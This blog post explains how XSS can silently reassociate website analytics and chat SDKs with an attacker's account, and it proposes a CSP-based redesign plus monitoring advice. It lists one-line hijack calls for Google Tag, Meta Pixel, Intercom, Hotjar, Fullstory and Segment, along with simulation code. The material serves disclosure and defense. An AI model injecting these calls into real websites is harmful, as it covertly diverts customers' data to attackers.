All data collection platforms, e.g., Google Analytics, Meta, Intercom, Segment, and Fullstory, open every website to data breaches

Posted Aug 21, 2023

(Internet Security)

If your website uses a data platform, it is open to data breaches, and your customers' data is insecure.

This is an old issue, and I am surprised no one takes this seriously.
This article explains how data platforms expose all customer-facing websites to exploitation and suggests a solution.

Today 98.7% of websites use JavaScript, and almost all of them use data collection platforms for analytics, advertising, customer experience, communications, payments, support, error monitoring, and more. All those platforms provide a snippet of code that must be added to the customer-facing website. Website owners have learned to limit incoming and outgoing traffic risks with a Content Security Policy that allows domains per usage, e.g., to enable data reporting only to Google Analytics domains. It turns out this doesn't stop the platforms from being hijacked, leaking data to hackers, and letting hackers interact with your customers on your behalf. All this is done undetectably, without fingerprints, and with a single line of code.

A few exploit examples

Hijacked Intercom allows hackers to impersonate you and your company and chat with your customers on your behalf.
Hijacked Google Analytics sends sensitive data to hackers' accounts.
Hijacked Hotjar and Fullstory send website session recordings to hackers' accounts.
Hijacked Segment redirects all data flow to the hackers' accounts.

Unstoppable hijack; security is an illusion

This exploit is unstoppable and untraceable with current technology. This is due to the current design of data platforms and the high risk of Cross-Site Scripting (XSS) on all websites.

Data platforms are open to everyone and used on almost every website. Website owners are fooled into thinking that a strict Content Security Policy (CSP) will stop websites from being hacked. In reality, hackers can leak data unnoticed and compromise websites through the very same allowed domains. Even if platforms required a domain allowlist in their settings, hackers could apply the same settings in their own accounts and still target any website.

XSS exploits are a threat to the Web

Browsers and Web standards don't provide complete XSS isolation and recommend using CSP, which cannot stop the data platform hijack.
80.2% of websites use JavaScript libraries and frameworks and tons of npm packages, which makes a 100% guarantee of XSS isolation impossible, opens new security holes in websites, and allows hackers to inject and execute harmful JavaScript.
Browser extensions installed by customers make websites vulnerable: extensions can inject and execute code and modify website content without anyone noticing.
ISPs, DNS providers, and proxies, including antivirus software, inject JavaScript and change website content without notice.

How data collection platforms work

The visited website executes a snippet provided by the data platform.
The website loads the platform's external script and initializes it with the snippet configuration.
The platform gets associated with the account(s) defined in the snippet.
The platform collects the data on its servers under the specified account(s).
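
The steps above can be sketched with a toy SDK. This is a minimal illustration, not any vendor's real code: createPlatform, init, track, and the "SITE_ACCOUNT" ID are all hypothetical names, and the send callback stands in for the network request to the platform's servers.

```javascript
// Hypothetical platform SDK (not a real vendor API).
function createPlatform(send) {
  let accountId = null;
  return {
    // The snippet associates the SDK with an account.
    init(id) {
      accountId = id;
    },
    // Every event is reported under the currently associated account.
    track(event) {
      send({ accountId, event });
    },
  };
}

// Stand-in for requests that would reach the platform's servers.
const received = [];
const platform = createPlatform((payload) => received.push(payload));

// What the snippet on the visited website does.
platform.init("SITE_ACCOUNT");
platform.track("page_view");

console.log(received);
```

Note that the account is plain runtime state set by a function call, which is the design detail the rest of this article is concerned with.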

The data platform hijack: the part where it gets hacked

XSS reassociates the platform with the hackers' accounts.
The platform collects and sends data to hackers' accounts.
XSS allows hackers to customize collected data and leak sensitive data.
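
To make the reassociation concrete, here is a small simulation under stated assumptions: the SDK below is a hypothetical stand-in (createPlatform, init, and track are invented names), and the sent array replaces real network traffic. It only shows the mechanism, not any specific platform's behavior.

```javascript
// Hypothetical platform SDK (not a real vendor API) whose account
// can be changed at runtime by any code running on the page.
function createPlatform(send) {
  let accountId = null;
  return {
    init(id) {
      accountId = id;
    },
    track(event, data = {}) {
      send({ accountId, event, data });
    },
  };
}

const sent = []; // stand-in for requests reaching the platform's servers
const platform = createPlatform((payload) => sent.push(payload));

// The website's own snippet.
platform.init("SITE_ACCOUNT");
platform.track("page_view");

// Injected by XSS: a single call reassociates the SDK...
platform.init("HACKER_ACCOUNT");
// ...and later events, including attacker-chosen data, are reported
// under the hacker's account.
platform.track("checkout", { email: "customer@example.com" });

console.log(sent.map((payload) => payload.accountId));
```

In this sketch both payloads travel through the same send channel, which mirrors why a CSP that allowlists the platform's domain would not tell the two accounts apart.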

A few single-line code examples of the data platform hijack

Google Tag: gtag("config", hackerAccountId)
Meta Pixel: fbq("init", hackerAccountId)
Intercom: Intercom("boot", {app_id: hackerAccountId})
Hotjar: Hotjar.init(hackerAccountId, 6)
Fullstory: FS.identify(hackerAccountId)
Segment: analytics.load(hackerAccountId)

Unless new technology standards are introduced and data platforms are redesigned, there is not much we can do to stop this.

Safe data platforms proposal

Here is a proposal for safe data platforms that are isolated from the hijacks that expose websites' sensitive data.

The data platform hijack can be prevented with CSP, an existing Web standard, by defining the platform account in the script link and not in code. Here are the requirements:

Platforms should be designed to work without CSP 'unsafe-inline' and 'unsafe-hashes', to minimize the high risk of XSS.
Define the data platform account in the script link, e.g., https://platform.com/script.js?accountId=ACCOUNT_ID, and NOT in code.
- Platforms would read the accountId using document.currentScript in a classic script or import.meta.url in a JavaScript module.
```
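// Module script: document.currentScript is null, so import.meta.url is used.
// A classic script must use document.currentScript.src alone (import.meta is a syntax error there).
const scriptURL = document.currentScript?.src || import.meta.url;
const accountId = new URL(scriptURL).searchParams.get("accountId");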
```
- Guide developers to list the absolute link, including the accountId, in the CSP header: script-src https://platform.com/script.js?accountId=ACCOUNT_ID.
- (Optional) Allow defining multiple accounts with comma separator https://platform.com/script.js?accountId=ACCOUNT_ID,ACCOUNT_ID2.
(Optional; extra security) Collect the data under the account-associated link https://platform.com/report/ACCOUNT_ID.
(Optional; extra security) Do not expose the platform script to a globally accessible 'window'; load it in the JavaScript module.
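
As a rough sketch of these requirements, a platform script could read its account(s) once from its own URL and expose no call that changes them. The names parseAccountIds and createLockedPlatform are hypothetical, the send callback stands in for the real reporting request, and the script URL is passed in as a string so the example does not depend on a browser.

```javascript
// Hypothetical helper: extracts one or more comma-separated account IDs
// from the URL the platform script was loaded from.
function parseAccountIds(scriptUrl) {
  const raw = new URL(scriptUrl).searchParams.get("accountId");
  if (!raw) return [];
  return raw
    .split(",")
    .map((id) => id.trim())
    .filter((id) => id.length > 0);
}

// Hypothetical SDK that fixes its accounts at load time.
// There is deliberately no init/config method to reassociate it.
function createLockedPlatform(scriptUrl, send) {
  const accountIds = Object.freeze(parseAccountIds(scriptUrl));
  return Object.freeze({
    track(event) {
      for (const accountId of accountIds) {
        send({ accountId, event });
      }
    },
  });
}

const reported = [];
const locked = createLockedPlatform(
  "https://platform.com/script.js?accountId=ACCOUNT_ID,ACCOUNT_ID2",
  (payload) => reported.push(payload)
);
locked.track("page_view");

console.log(reported);
```

In a browser, the first argument would come from document.currentScript.src or import.meta.url, as described in the list above.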

Guide developers to set a correct CSP header, and validate that they have done so (do not deliver CSP in an HTML meta tag, because it can be overwritten).

Content-Security-Policy: default-src 'none';
    script-src 'self' https://platform.com/script.js?accountId=ACCOUNT_ID;
    connect-src https://platform.com/report/ACCOUNT_ID;

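This CSP with a link containing the accountId would disable account reassociation and prevent data from being collected under the wrong account. One caveat: CSP source matching compares scheme, host, port, and path and does not take the query string into account, so to be enforceable the account ID would need to be part of the path, as in the connect-src link.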

Regarding Web standards, the proposal is to eliminate "illegal" JavaScript execution entirely, whether it is executed by a browser extension (not only code injection but any code execution, including header rewrites, e.g., of CSP) or in developer tools. Since adding new Web standards takes many years, this is unlikely to happen soon.
Operating systems, DNS resolvers, and browsers could identify and prevent ISPs, DNS providers, and proxies from manipulating website responses. Somebody should address, in Web standards and Internet laws, how Internet resources may be filtered or blocked and how that will affect the interface.

I have brainstormed more workarounds, e.g., ownership verification in DNS. Still, the one described above would be bulletproof.

Advice to website owners

Train developers to understand how the Web works, and to know the security risks and the cost of failures to your business. Research your third-party services and code, their requirements, risks, and policies. Regarding the platform hijack, raise your concerns with your platform's support so that they cover all security issues, or reconsider whether using the platform as is is worth the risk.
Website developers can look for ways to monitor account reassociation and, when a hijack happens, block access to the website or immediately reassociate back to the original account. Feel free to brainstorm and propose a safer Web.
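
One possible way to monitor reassociation, sketched under assumptions: wrap a platform's command function so that any "config"-style call with an account ID outside an allowlist is reported and dropped. guardConfig is a hypothetical helper, the (command, accountId) call shape is only modeled on the gtag-style example earlier, and the command function here is a local stand-in rather than a real platform global.

```javascript
// Hypothetical guard: forwards calls to the original command function,
// but reports and drops "config" calls that use an unexpected account ID.
function guardConfig(commandFn, allowedIds, onViolation) {
  return function guarded(command, accountId, ...rest) {
    if (command === "config" && !allowedIds.includes(accountId)) {
      onViolation(accountId);
      return undefined; // the reassociation attempt is not forwarded
    }
    return commandFn.call(this, command, accountId, ...rest);
  };
}

// Stand-in for a platform's command function.
const forwarded = [];
const violations = [];
const command = guardConfig(
  (...args) => forwarded.push(args),
  ["SITE_ACCOUNT"],
  (id) => violations.push(id)
);

command("config", "SITE_ACCOUNT");   // allowed
command("config", "HACKER_ACCOUNT"); // reported and dropped
command("event", "click");           // unrelated commands pass through

console.log({ forwarded, violations });
```

This is a detection aid at best. Injected code that runs before the guard is installed, or that reaches the platform through another entry point, would bypass it, which is why the redesign proposed above remains the stronger fix.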